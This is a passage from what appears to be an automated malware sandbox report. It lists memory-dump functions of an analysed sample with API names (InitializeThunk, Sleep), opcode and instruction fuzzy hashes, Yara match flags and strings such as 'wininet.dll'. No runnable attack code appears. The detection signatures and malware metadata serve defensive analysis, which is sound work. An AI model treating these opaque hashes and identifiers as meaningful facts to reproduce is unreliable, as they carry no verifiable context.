                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 023407AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0233FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                        • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                        • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                        • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0233FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0233FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0233FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0233FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                        • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                        • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                        • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0233FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0233F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0233F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0233FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                        • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                        • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                        • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0233FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                        • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                        • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                        • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0233FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0233FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0233FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
                                                                                                                                                        • Associated: 00000007.00000002.2377225471.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377373773.0000000002410000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377381920.0000000002420000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377391054.0000000002424000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377399247.0000000002427000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377419318.0000000002430000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000007.00000002.2377469074.0000000002490000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                        • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                        • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                        • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00096EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 00096F88
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Sleep
                                                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                                                        • Opcode ID: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
                                                                                                                                                        • Instruction ID: 0f707b3f56f18ff137c7633a2670dd9689bc023109fd879f31b039d4d1d42731
                                                                                                                                                        • Opcode Fuzzy Hash: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
                                                                                                                                                        • Instruction Fuzzy Hash: 8C3190B1602704ABCB25DF68D8B1FABB7F8BB48700F00842DF61A5B242D771A545DBA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00096ED7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 00096F88
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Sleep
                                                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                                                        • Opcode ID: 9ab8c3487d6b55de56572ae576bec8d21e7b02f491d24a269a961bf960411c1f
                                                                                                                                                        • Instruction ID: 6a1ace9120ec83e204e110dc64c899c9740bbda31891c68fdea98cf6b80e7a8a
                                                                                                                                                        • Opcode Fuzzy Hash: 9ab8c3487d6b55de56572ae576bec8d21e7b02f491d24a269a961bf960411c1f
                                                                                                                                                        • Instruction Fuzzy Hash: 4521D3B1601705ABCB10DF68D8A1FABB7F4FF48700F10802DF61A6B242D775A555DBA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 000984C9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
